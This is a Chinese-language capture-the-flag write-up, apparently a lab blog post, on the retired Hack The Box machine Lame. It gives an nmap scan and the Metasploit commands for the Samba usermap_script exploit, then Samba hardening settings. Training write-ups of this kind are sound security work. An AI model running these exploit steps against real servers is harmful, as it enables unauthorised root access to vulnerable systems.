出品|MS08067實驗室(www.ms08067.com)
本文作者:shavchen
01 前言
這次挑戰的靶機是Lame,距今900天+,歷史感十足
靶機描述
Lame is a beginner level machine, requiring only one exploit to obtain root access.
It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
技能識訓:Smaba漏洞利用
02 資訊收集
基本資訊
Kali ip :10.10.14.3
Lameip:10.10.10.3
通信正常,延時偏高
埠掃描
nmap -sV -A -p- 10.10.10.3
啊,Samba
03 漏洞利用
靶機開啟了Smaba服務,那還有什么好說的
search Samba
選擇exploit/multi/samba/usermap_script
use exploit/multi/samba/usermap_script
set rhosts 10.10.10.3
exploit
emem,至此完成?靶機簡單,那我們加固一下吧
04 安全加固
查看samba版本
修改組態檔,位置:/etc/samba/smb.conf
- 不使用明文密碼
#加入引數
encrypt passwords=yes
smb passwd file=/etc/samba/smbpasswd
這樣,當security=user時,通過/etc/samba/smbpasswd檔案進行驗證,驗證程序無明碼傳輸
-
不使用共享級別的安全
當security=share的時候,samba安全性比較差,靈活性不強,所以應避免使用共享級別安全 -
限制網路介面訪問
這個適用于多網卡用戶,限制samba只回應來自內網的用戶請求
interfaces=192.168.1.1/24 127.0.0.1
bind interfaces only=yes
- 控制訪問串列
#ip控制
hosts deny=ALL
hosts allow=192.168.1.0/24 127.0.0.1
#主機控制
hosts deny=ALL
hosts allow=win01,win02,win05
#用戶控制,允許用戶smb01,smb02與組samba,admin訪問
valid users=smb01,smb02,@samba@admin
- 配置iptables
samba經常被配置在有雙網卡的機器上,samba做為內網專用服務,應該隔絕外網以保護samba,這里可以使用iptables封鎖以下埠,不允許外網訪問137,138,139埠!
iptables -t filter -A INPUT -p tcp --dport 139 -j DROP
- 升級samba版本
apt-get install samba
?
?
?
轉載請聯系作者并注明出處!
Ms08067安全實驗室專注于網路安全知識的普及和培訓,團隊已出版《Web安全攻防:滲透測驗實戰指南》,《內網安全攻防:滲透測驗實戰指南》,《Python安全攻防:滲透測驗實戰指南》,《Java代碼安全審計(入門篇)》等書籍,
團隊公眾號定期分享關于CTF靶場、內網滲透、APT方面技術干貨,從零開始、以實戰落地為主,致力于做一個實用的干貨分享型公眾號,
官方網站:https://www.ms08067.com/
掃描下方二維碼加入實驗室VIP社區
加入后邀請加入內部VIP群,內部微信群永久有效!
?
?
?
?
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/266627.html
標籤:其他
上一篇:CDN是什么